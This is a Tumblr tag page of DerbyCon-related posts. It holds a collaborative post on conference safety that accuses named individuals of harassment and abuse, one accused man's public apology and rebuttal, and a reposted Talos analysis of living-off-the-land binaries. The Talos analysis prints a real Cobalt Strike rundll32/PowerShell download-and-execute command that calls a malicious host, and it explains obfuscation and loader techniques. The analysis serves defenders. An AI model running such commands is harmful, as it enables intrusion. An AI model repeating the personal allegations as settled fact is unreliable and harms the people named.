#derbycon | Explore Tumblr posts and blogs

infosecwomen · 7 years ago

Text

Increasing Safety and Inclusiveness at Hacker Cons

This roadmap for addressing the problems which soured this September in Louisville is a collaborative work by numerous women… many who attended DerbyCon Legacy (some have attended every single year), others who came but left early, some who stayed away entirely because of the news of what was happening, and additional women who have previously vowed to not attend such events at all unless some of the deep-rooted problems in Infosec (which are not unique to any one specific event) can be addressed by conference leadership.

We appreciate the fact that Dave Kennedy, Martin Bos, and many of the volunteers from DerbyCon have engaged the public in a dialog regarding how to best provide for the safety and well-being of hacker con attendees in the future. It is wonderful, their willingness to take steps in a positive direction, and we accept their invitation for open discussion.

There are three steps we see DerbyCon proceeding through in the process of repairing their public image and improving safety for women at conferences. They are outlined here…

[= I. Adopt and Publicly-Post a Code of Conduct =]

Even though a small contingent of people have resisted this in the past, DerbyCon has made significant progress in this area recently. That’s wonderful. A Code of Conduct protects a conference as much as it protects the attendees. Many prominent speakers and sponsors won’t participate at events without one, and even the smallest and most far-flung of hacker cons have been adding them to their web sites and programs.

A Code of Conduct doesn’t have to be long, full of legalese, or kill the “friendly” feeling of an event. It really only has to do four simple things:

State that the event wants to be a welcoming and safe place for all attendees (DerbyCon already says this and has been telling the community that for years now)

Explain what behaviors are not tolerated (this, unfortunately, is where DerbyCon fails to be adequately specific)

Explain how people should report problems (DerbyCon, like many events, encourages people to “contact staff” but the preferred language would include an email address or other contact information that is monitored 24/7 during the con. (If someone is holed up in his or her room because of threats, they shouldn’t have to venture downstairs looking for a red shirt or scroll through Google results trying to find the right Security contact)

A commitment to enforce these rules. (DerbyCon claims to stand for the security of all attendees, but unfortunately we have seen that there have been some stumbles in the past when it comes to follow-up on problems)

DerbyCon can solve point #2 & point #3 with the addition of honestly just one or two lines of text.

At least one hacker con has summarized their Code of Conduct as, “If you are a jerk, we’ll ask you to leave." Examples of being a jerk include harassing, forcing unwanted interactions, or secretly replacing someone’s coffee with Folgers crystals.” Humor can be just fine here! (As long as the two most critical points of “don’t harass others” and “don’t force yourself upon others” are spelled out.)

The “contact” information can truly be an email like [email protected] as long as it’s being monitored throughout the whole event. DM-ing the conference Twitter can work but that requires open DMs (which not all Twitter clients support well) and forces a staffer to sift through a lot of messages, many of which will be just noise.

[= II. Sunlight as Disinfectant =]

This may be the hardest pill to swallow. Right now, we are not aware of any public-facing resolution or closure on these matters aside from Dave and Martin tweeting that things are going to get much better in the future. That alone will not mollify those with concerns nor will it make women want to start attending/proposing in record numbers.

There were two separate major incidents this year, and they were deeply inter-related. DerbyCon would be wise to make blog two posts on their site in which they discuss them frankly and offer clear public apologies for any ways in which they feel they didn’t live up to their full stated hopes of being a con for everybody in the hacker family:

Failure to condemn and expel harassers

While the mishandling of the matter relating to a trainer with a restraining order due to domestic abuse was deeply troubling, harassment is actually the wider matter at DerbyCon, and the issue that keeps women away so much. Given no Code of Conduct prohibiting harassment, a small but vocal group of angry voices targets their rage at people in an attempt to either make them stay away from DerbyCon or not enjoy DerbyCon if they attend. This angry group (to varying degrees) has at times included both staff as well as the general attendee public. While folk such as the former security staffer and his posse of associates represent the worst of it, plenty of things that the conference videographer has stated online cross the line into harassment, as well. Even one of the conference founders, generally a kind person, has threatened physical violence against people and profanely told women to be silent when they have criticized DerbyCon online.

This is a topic where DerbyCon has to dedicate extra care during the repair of its reputation, since it became public during the con this year that most of the hatred and abuse is generated within a Facebook group calling itself the “illmob” (a group apparently started and overseen by the fired security staffer) which includes the DerbyCon founders and several other conference staff as fellow members.

NOTE - This is not to suggest in any way that said Facebook group’s sole purpose is to harass women, but simply to point out that the creation of the harassing tweets, image memes, apparel, etc takes place here in full view of the DerbyCon conference staff. They cannot claim ignorance regarding the identity of the people behind the harassment.

The mishandling of reports of an alleged abuser of women

This is more delicate, and a private matter, but DerbyCon can speak to the problem respectfully and in a way that tells the public (a) what went wrong and (b) what they will do differently in future.

The earlier blog post, about the harassment issue, is harder to put into words but it would be good if it (1) acknowledges that attendees have been subject to online harassment in the past, (2) explicitly states that this is not what DerbyCon is about and that this is not OK, (3) apologizes for any statements made in the heat of the moment by the DerbyCon team which could be construed as harassment, and (4) includes a commitment to prevent this behavior in the future… a promise that staff will be professional and a promise to eject or bar attendees who harass others.

[= III. The Ramifications =]

So here’s where the rubber really meets the road.

Actions speak louder than words.

If DerbyCon is going to be taken seriously, and to satisfy Point #4 regarding a Code of Conduct as mentioned above, they must demonstrate their genuine commitment to:

standing by their updated Code of Conduct

handling reports of abuse/safety risks/etc properly.

DerbyCon has stated that they’ve “never banned anyone” and described how they feel that the community has failed if things get to that point. This is not so. It fails the community to have rules and policies but never actually follow through on them.

As hard as it will be for them:

* Will Genovese represents the most clear-cut violation of a Code of Conduct that anyone has ever seen. He has repeatedly harassed numerous people over the years (and reserves the bulk of his ire for women and their supporters) and this year went so far as to put DerbyCon at actual legal risk by harassing attendees and abuse victims while speaking on behalf of the conference itself. Even after he was fired he continued to harass attendees (and non-attendees who simply spoke about DerbyCon) online and at the conference. The DerbyCon Code of Conduct carries basically no weight if people who behave in this manner are allowed to attend. There are others who have said hateful or harassing things to a lesser degree… but Will has taken it to the point of publicly posting both text and images that do nothing but sow hate and discontent at DerbyCon. For the community (particularly women) to take even slightly seriously the notion that DerbyCon is trying to improve, Will would not be invited back to DerbyCon nor welcomed as an attendee.

* the individual subject to police investigations, an Order of Protection, and court filings for abuse would not be invited back to DerbyCon as a trainer nor welcomed back as an attendee. The fact that he was subject to an Order of Protection backed up by a report of physical violence should have been enough there (and Martin Bos claimed back on August 30th that an O.o.P. was more than enough reason to ban him) We are not talking about an Administrative Non-Contact Order (which basically anyone can get on anyone else for almost any reason) but an Order of Protection based on police-documented abuse. Once the police (not just courts, but the police) are taking things seriously, come on… that’s a person you don’t want at your conference.

* Bryce Case Jr. (a.k.a. YT Cracker) would not be invited to DerbyCon as an artist nor welcomed as an attendee. Again, this is someone with a long history of security violations and drunken abuse of women at other conferences. There are records of all this. It is unclear if the /courts/ were ever involved, so this individual represents a different standard of evidence… but he unmistakably is a known bad actor and if DerbyCon can’t bring themselves to prevent his attendance, it is a signal to the community (especially women) that DerbyCon is not a place where people are safe.

* The DerbyCon videographer is the hardest case here. He has engaged online in what is seen by many as harassment. It has seldom been /directed/ at anyone, however. Instead, his comments are broad and focused against women and their supporters as opposed to calling out a specific person here or there. Also, as his defenders have pointed out, some of this has become more managed in recent months. Our willingness to give him space to reform has nothing to do with his tireless work on video recording… there is no ‘hours of volunteer work / hateful behavior forgiveness’ exchange rate system. We are not without understanding; he could remain part of DerbyCon (where he is cared about by many individuals who are trying to help him improve himself) in a Volunteer role as opposed to being on Staff and this might placate the majority of the community. But there will always be a number of women who will not feel safe attending any conference or event where he is present as anything other than an attendee. (This is why BSides events sadly had to take the difficult steps that they did and remove him.) It is hoped that his behavior continues to improve and that DerbyCon will never have to bar him outright.

It is interesting that in the case of the trainer and the music artist, they aren’t actually in direct violation of the Code of Conduct, because nearly all of their misdeeds took place off-site and at other events. But barring them from future attendance is of course part of a greater safety management process… which needs to be addressed by internal policy: How do you decide that someone is a safety violation to your attendees? How is this researched? What counts as evidence? With whom does the final decision rest? All of this needs to be written down somewhere. Not necessarily posted publicly, but written down and made available in cases where parties request to see it. This is very important for DerbyCon to legally cover their butts and it’s astonishing if some policy like this doesn’t already exist.)

If DerbyCon makes good on these three key areas – a more fully-realized Code of Conduct, public posts describing the difficulties and apologizing to the community, and finally breaking with tradition by actually officially barring certain known bad actors from attending in the future – then this would be considered a welcome (and really big) step in the right direction for the conference. And for the hacker community at large.

6 notes · View notes

patrickcmiller · 5 years ago

Link

via Twitter https://twitter.com/PatrickCMiller

#IFTTT #Twitter

0 notes

friendshapedplant · 4 years ago

Text

Because I can't help myself I will elaborate on my meme

There was a hacker convention called Derbycon going on the beginning of September 2019 in Louisville. I'm not a hacker but my dad is kinda and so my family got to take a lil trip there and hacker or not twas a fun lil time!

We were out eating and noticed all these young girls with their hair up in a bow wearing Jojo Siwa shirts and such and I was like "There can't coincidentally be all these young girls with their hair up in a bow wearing Jojo Siwa shirts and such there's gotta be a reason" and it turned out there was some Jojo Siwa event also going on in Louisville around the same time as Derbycon and I thought it was kinda funny that these two very different demographics were occupying the same town.

I have an urge to make a very specific meme that no one would get

#atlas.txt

9 notes · View notes

ultra-movaxbx-ru-posts · 6 years ago

Text

Make It Rain with MikroTik

Make It Rain with��MikroTik

Original text by Jacob Baines

Can you hear me in the… front?

I came into work to find an unusually high number of private Slack messages. They all pointed to the same tweet.

Why would this matter to me? I gave a talk at Derbycon about hunting for bugs in MikroTik’s RouterOS. I had a 9am Sunday time slot.

You don’t want a 9am Sunday time slot at Derbycon

Now that Zerodium is paying…

View On WordPress

#Code #gcc #hacking #idapro #linux #MikroTik #revers #Reverse Engineering

0 notes

gwlarson2002 · 6 years ago

Link

0 notes

prevajconsultants · 6 years ago

Text

Breaking Out of Shells at DerbyCon https://t.co/xbp4TUSsQ3

Breaking Out of Shells at DerbyConhttps://t.co/xbp4TUSsQ3

— Wordfence (@wordfence) October 12, 2018

wordfence

#Website Security #Wordfence WordPress security plugin #Protect your website from hacks and malware

0 notes

comss · 6 years ago

Text

Защиту от шифровальщиков в Windows 10 можно обойти с помощью инъекции DLL

На прошлой неделе на конференции по компьютерной безопасности DerbyCon, один из исследователей продемонстрировал, как с помощью инъекции DLL можно обойти защиту функции «Контролируемый доступ к папкам» в Windows 10

via Антивирусы, обзоры и тесты https://ift.tt/2QDoYUw

#comss #антивирус

0 notes

ytcracker · 7 years ago

Text

crying to radiohead isn’t lame

(you can jmp loc_888 if you just want my final thoughts.)

in a recent tumblr manifesto directed at convention organizers regarding their lack of codified rules of conduct and lackadaisical approach to safety, i was outed as a big part of the overall problem:

Bryce Case Jr. (a.k.a. YT Cracker) would not be invited to DerbyCon as an artist nor welcomed as an attendee. Again, this is someone with a long history of security violations and drunken abuse of women at other conferences. There are records of all this. It is unclear if the /courts/ were ever involved, so this individual represents a different standard of evidence… but he unmistakably is a known bad actor and if DerbyCon can’t bring themselves to prevent his attendance, it is a signal to the community (especially women) that DerbyCon is not a place where people are safe.

the author of this section is admittedly shannon morse (aka snubs), who, rightfully so, has a beef with me for an incident that happened at the bsides las vegas pool party in 2014. i was dared by a friend to grab her butt and, like a third grader, proceeded to fulfill this dare.

yes, i was highly intoxicated - i don’t offer that as an excuse, just as backstory. the drinks were flowing and i had been pretty belligerent that evening - i kept turning up the volume on the mixer vs. the wishes of the convention organizers; my rap performance was sub-par, the dj performance even worse. i don’t deny that i was in rare form in the wrong way.

the next day, i apologized to everyone i thought that i had fucked things up with the night before. i was able to piece together a lot of the events that were foggy through the human blockchain i was with. a lot of people do embarrassing shit when they are inebriated, and i am definitely no stranger to being “that guy.” i am not, however, some kind of sexual predator.

i was not invited back to the party in 2015; i didn’t really expect to be invited back due to my actions the previous year. at this point in the story though, i still didn’t even know the snubs issue existed. it wasn’t until december when snubs tagged me regarding the incident in a defcon videos thread: https://twitter.com/Snubs/status/673553028847263744 http://archive.is/Uj1zT

i immediately hit up int80 and whoever else i could regarding this whole thing and emailed shannon to sort it out: https://imgur.com/a/nLzam

long story short, she told me everything i did that evening. i apologized and told her i was wrong and if she or her man wanted to take a crack at me, i deserved it. i truly feel terrible about it. i am not in the wholesale business of violating people, just their computers.

snubs acknowledged that we hashed it out over email and things were kosher: https://twitter.com/Snubs/status/673641949279096833 http://archive.is/9NHtz

i spoke with the bsideslv folks in DMs, they tweeted my apology and request for grievances. i won’t screenshot, but here: https://twitter.com/BSidesLV/status/674391295616352256 http://archive.is/3XaOi

i thought my mea culpa was SYN ACKd, and the world was flat again. i was asked by bsideslv to perform again in 2016. i even pointed out in the email that if snubs was unhappy with my presence there that i would not attend: https://imgur.com/a/ZOhQA

perhaps there was a miscommunication, but i did think everything was ok at this point. i think any reasonable human being would. in august, during the defcon festivities, snubs took to twitter again: https://twitter.com/Snubs/status/761853967110242304 http://archive.is/LeNx0

i told her i was more than happy to apologize in person and i thought this was worked out: http://archive.is/a5yCq

we didn’t hash it out, obviously. anyway, this must’ve been stewing for some time. i don’t blame her for being pissed off and it is totally her choice to be mad at me. she can be mad at me forever if she wants, and i know now after the recent tumblr post and the video where she recounts this story and voldemorted me (see below), she does not like me:

youtube

if you’ve made it this far, congratulations.

loc_888:

look, i admit i am an imperfect human that is a stellar fucking idiot when he’s rammed a bunch of alcohol down his throat, but i will not cop to being a serial rapist or chester molester or threat to people at conventions. i admit that grabbing shannon was poor judgement and poor behavior and i am sorry i put her through that. however, if there’s some giant body of evidence out there that i am the hacker bill cosby on some tyler durden, multiple personality shit then please, show it to me. rarely am i ever alone at conventions, so there are usually always witnesses to my conduct. it is totally disingenuous to paint me with that large of a brush.

in lieu of a heavy handed CoC, i am all for setting up a shitlord dunk tank at these conventions - $5 to dunk me in manure like some back to the future tannen cosplay - with all of the proceeds going to female STEM organizations, or whatever else you think i am against. there are real fucking assholes out there, and i don’t know if i am one of them.

don’t touch people without their consent, and don’t be a fucking dickhead. everyone makes mistakes, something glass houses two in the bush gets the worm.

#infosec #infosecwomen

1 note · View note

kirito-1011 · 5 years ago

Text

Derbycon 2019 – Confessions of an IT OT Marriage Counselor

[ad_1]

I discuss the trials and tribulations of trying to bring IT cybersecurity and Operational Technology (ICS) teams together to tackle new threats.

[ad_2]

View On WordPress

#Cyber Attack #Cyber Security News #hacking news #hacking tool #Spy #vulnerabilities

0 notes

terabitweb · 5 years ago

Text

Original Post from Talos Security Author:

By Vanja Svajcer.

Introduction

Attackers’ trends tend to come and go. But one popular technique we’re seeing at this time is the use of living-off-the-land binaries — or “LoLBins”. LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.

Living-off-the-land tactics mean that attackers are using pre-installed tools to carry out their work. This makes it more difficult for defenders to detect attacks and researchers to identify the attackers behind the campaign. In the attacks we’re seeing, there are binaries supplied by the victim’s operating system that are normally used for legitimate purposes, but in these cases, are being abused by the attackers.

In this post, we will take a look at the use of LOLBins through the lense of Cisco’s product telemetry. We’ll also walk through the most frequently abused Windows system binaries and measure their usage by analyzing data from Cisco AMP for Endpoints.

You’ll also find an overview of a few recent campaigns we’ve seen using LoLBins, along with recommendations for how to detect malicious LoLBins’ activities.

What are LoLBins

A LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

The concept of LoLBins is not new and isn’t specific to Windows. Almost all conventional operating systems, starting from the early DOS versions and Unix systems, contained executables that attackers could exploit.

Here is an example from the mid 80s in which binary code to reboot the computer was supplied to the default debug.com DOS debugger as text, designed to avoid detection by anti-malware scanners and run malicious code as intended.

N SET.COM A 100 MOV AX,0040 MOV DS,AX MOV AX,1234 MOV [0072],AX JMP F000:FFF0 RCX 10 W Q

In their presentation at DerbyCon 3, Matthew Graeber and Christopher Campbell set the baseline for Windows, by discussing the advantages of using default Windows binaries to conduct red team activities and avoiding defensive mechanisms.

In this post we also focus on Windows LoLBins and their usage today.

Overall, attackers can using LoLBins to:

Download and install malicious code

Executing malicious code

Bypassing UAC

Bypassing application control such as (WDAC)

Attackers may be able to target other utilities that are often pre-installed by system manufacturers and may be discovered during reconnaissance. These executables can be signed utilities such as updaters, configuration programs and various third party drivers.

The usage of LoLBins has been frequently combined with legitimate cloud services such as GitHub, Pastebin, Amazon S3 storage and cloud drives such as Dropbox, Box and Google Drive. By using legitimate cloud services for storage of malicious code, command and control (C2) infrastructure and data exfiltration attackers activities are more likely to remain undetected as the generated traffic does not differ from the traffic generated by systems that are not compromised.

Talos is mainly interested in finding executables that can be used to download or execute malicious code. In our research, we monitor daily execution patterns of the following executables to detect their abuse:

powershell.exe

bitsadmin.exe

certutil.exe

psexec.exe

wmic.exe

mshta.exe

mofcomp.exe

cmstp.exe

windbg.exe

cdb.exe

msbuild.exe

csc.exe

regsvr32.exe

Abusing PowerShell

A primary suspect for malicious code download and in-memory execution in the recent period is PowerShell. Threat actors commonly use this command shell, which is built on the Windows management and .NET frameworks. This powerful administration environment has a security policy that can prevent the execution of untrusted code. Unfortunately, this policy can be easily circumvented with a single command line option.

One could argue that the execution of PowerShell with the option to bypass security policy should be outright blocked. However, there are a number of legitimate tools, such as Chocolatey package manager and some system management tools that use the exact command line.

PowerShell’s code is not case-sensitive, and it will accept shortened versions of command line options, as long as the option isn’t ambiguous. For example -EncodedCommand option, which accepts a Base64-encoded string as a parameter can also be invoked as -EncodedC or even -enc, which is commonly used by malicious actors.

Popular malware like Sodinokibi and Gandcrab have used reflect DLL loaders in the past that allows attackers to load a dynamic library into process memory without using Windows API.

The Invoke-Obfuscation module is often used to create polymorphic obfuscated variants, which will not be detected by antivirus programs and other defensive mechanisms.

Over time, attackers have also realized the malicious potential of PowerShell, widening the number of executables used as LoLBins. Msbuild.exe and C# compiler csc.exe are some of the most frequently used by red teams. Both are frequently used to download, build and load malicious code that is built for that particular system and does not appear on any executable block list.

Measuring LoLBins usage

We analyzed telemetry provided from Cisco AMP for Endpoints to measure how often LoLBins are abused. The telemetry, sent over a secure channel, contains names of invoked processes and cryptographic checksums of their file images which helps us with tracking file trajectories and building parent-child process relationships that can be used for hunting.

An example of process retrospection graph in AMP telemetry.

The telemetry data is focused on detecting new attacks as they happen but it should also allow us to measure how many potential LoLBin invocations are suspicious.

We looked at different LoLBins where the decision could be made quickly. In all cases, we’re assuming the worst-case scenario and designated any invocation of the following processes with a URL as a parameter as suspicious:

mshta.exe

certutil.exe

bitsadmin.exe

regsvr32.exe

powershell.exe

Our relaxed definition of suspicious process invocation means that will also have significant false positive rate. For example, for PowerShell invocations with a URL in command line, we estimate that only 7 percent of the initially chosen calls should be checked in-depth and are likely to be malicious.

We obtain the percentage of suspicious calls by mining billions of daily data points and dividing the number of detected suspicious calls with the overall number of calls. Overall, our worst-case scenario shows that at least 99.8 percent of all LoLBins invocations are not worth further investigation.

LoLBins and percentages of suspect invocations.

We then distilled down these potentially suspicious calls to find the ones that are likely to be malicious.

Once again, we will take PowerShell. The worst figure for potentially suspicious PowerShell process executions was 0.2 percent. However, as mentioned before, only 7 percent of those actually require in-depth investigation, which brings the percentage down to 0.014 percent. Therefore, at least 99.986 percent of PowerShell invocations are legitimate.

A simple rule of thumb for URLs that can be used to pinpoint calls that are more likely to be malicious is to look for LoLBins invocation combined with:

External numeric IP address

Any .net TLD

Any .eu TLD

Any .ru TLD

Any URL ending with an executable or image extension (e.g. .EXE, .LNK, .DLL, .JPG, .PNG etc.)

Any reference to Pastebin.com and its clones

Any reference to Github or any other source code repository sites

Red teams’ activities

Although the majority of recorded suspicious calls belong to malicious actors, it is worth noting that red-team activities are also visible. Here, security teams and penetration testers are often using adversarial simulation frameworks such as Red Canary Atomic tests to test the organizational defences against tools, techniques and processes as classified in the ATT&CK knowledge base.

Some red team tools are tailored to mimic activity of popular tools such as Mimikatz. Here is an example of a tailor-made script hosted on GitHub to emulate adversarial technique of using a reputable domain to store malicious code.

Red team members using fake Mimikatz module to test defenses.

LoLBins actors’ skill levels

In this section, we’ll describe three individual campaigns, showing usage of PowerShell combined with memory-only code from three different actors with different skill sets. These campaigns can be relatively easily detected by internal hunting teams by analyzing command lines and their options.

Case 1: Common ransomware

The first case involves the Sodinokibi ransomware. Sodinokibi is a rather common ransomware that spreads by using standard methods like phishing and exploit kits, as well as exploiting vulnerabilities in web frameworks such as WebLogic.

We see from telemetry that PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.

Initial Sodinokibi PowerShell invocation.

The downloaded code is a reflective DLL loader with randomized function names to avoid simple pattern based detection engines. The ransomware payload is Base64-encoded and stored in the variable $PEBytes32. It is worth noting that Base64 executable payloads can be instantly recognized by the initial two characters “TV,” which get decoded into characters “MZ” for the start of DOS executable stub of a PE32+ executable file.

Reflective DLL loader loads Sodinokibi payload

Sodinokibi and Gandcrab are very common, but that does not mean that actors behind them are not technically proficient. Although they use off-the-shelf techniques to spread and execute payloads, we can still estimate that they have an intermediate skill level.

Case 2: Intermediate miner

Our second actor used the Powershell ability to obfuscate code and deobfuscate several layers of obfuscation in memory before reaching the actual PowerShell script that installs and launches a cryptocurrency-mining payload.

First Invoke-Obfuscation layer decoded

The Invoke-Obfuscation module is often used for PowerShell obfuscation. Apart from obfuscating the whole next layer script code, it also hides the invocation on Invoke-Expression (IEX) cmdlet. In this example, the $Env:COMSpec variable contains the string “C:WindowsSystemcmd.exe” so that joined fourth, 15th and 25th character form the string “iex.”

This cryptocurrency miner had five deobfuscation stages and in the final one, the invocation of IEX was hidden by getting the name of the variable MaximumDriveCount using “gv” (Get-Variable cmdlet) with the parameter “*mdr*” and choosing characters 3,11 and 2 to form it.

Extracting ‘iex’ from MaximumDriveCount

The downloaded PowerShell scripts contains the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.

Deobfuscated crypto-miner loader

Case 3: Hiding Cobalt Strike in network traffic

Our final case study shows activities of a more advanced actor. The actor uses Cobalt Strike beacon for their post exploitation activities with a Powershell stager taken from the Cobalt Strike framework.

The telemetry shows this attack launched by abusing rundll32.exe and the command line invoking JScript code to download a web page and launch the initial PowerShell stager.

rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');

The first PowerShell stage, webax.js, despite misleading filename extension, decompresses the second-stage PowerShell code that loads the first shellcode stage into memory and creates a specific request to download what seems like a standard jQuery JavaScript library.

Cobalt Strike PowerShell stager

The shellcode creates a HTTP GET request to the IP address 134.209.176.24, but with header fields that indicate that the host we are looking for is code.jquery.com, the legitimate host serving jQuery. This technique seems to successfully bypass some automated execution environments which in their analysis results show that the request went to the legitimate host and not to the malicious IP address.

HTTP header with the spoofed host field

The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.

The beginning and the end of malicious jQuery and Cobalt Strike payload

The malicious jQuery ends with 1,520 bytes of the actual jQuery code, presumably to avoid anti-malware scanners scanning the request top and tail.

This technique of hiding binary payload within jQuery library and evasion of malicious IP address detection shows that we are dealing with a more advanced actor, which takes their operational security seriously.

Overall, we cannot pinpoint a single type of actor that focus on using LoLBins. Although they may have been used only by more advanced actors, today they are also used by actors employing common malicious code such as ransomware or cryptominers.

Detecting and preventing LoLBins abuse

The protection against abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected based on the parent-child relationship of the launched processes as well as anomalies in network activity of processes that are not usually associated with network communication.

Organisations are advised to configure their systems for centralized logging where further analytics can be performed by hunting teams. Since version 5, Powershell can also be configured to log execution of all executed code blocks to Windows event log. This allows members of security teams to understand obfuscated code which needs to be deobfuscated before it is run. The execution of deobfuscated code will be visible in Windows event logs.

However, the best possible protection is to deny execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block execution of LoLBins not required on protected systems.

Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.

Conclusion

Our research shows that many types of actors are employing various techniques to use LoLBins in their activities, from commodity malware to more targeted attacks. However, the overall proportion of malicious usage is very low (below 0.2 percent), which is not enough to block all invocations of LoLBins.

However, blue team members must keep LoLBins in mind while conducting regular hunting activities. If used successfully, an attacker can use these to make their attacks more difficult to trace or make their malware linger for longer on the victim machine.

Coverage

It is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IoCs

Sodinokibi

dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1 dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80

Xmrig related

4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83 e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468 3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172 92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590

Cobalt strike stager

522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d 4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5 f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Hunting For LoLBins Original Post from Talos Security Author: By Vanja Svajcer. Introduction Attackers' trends tend to come and go.

#Talos Security

0 notes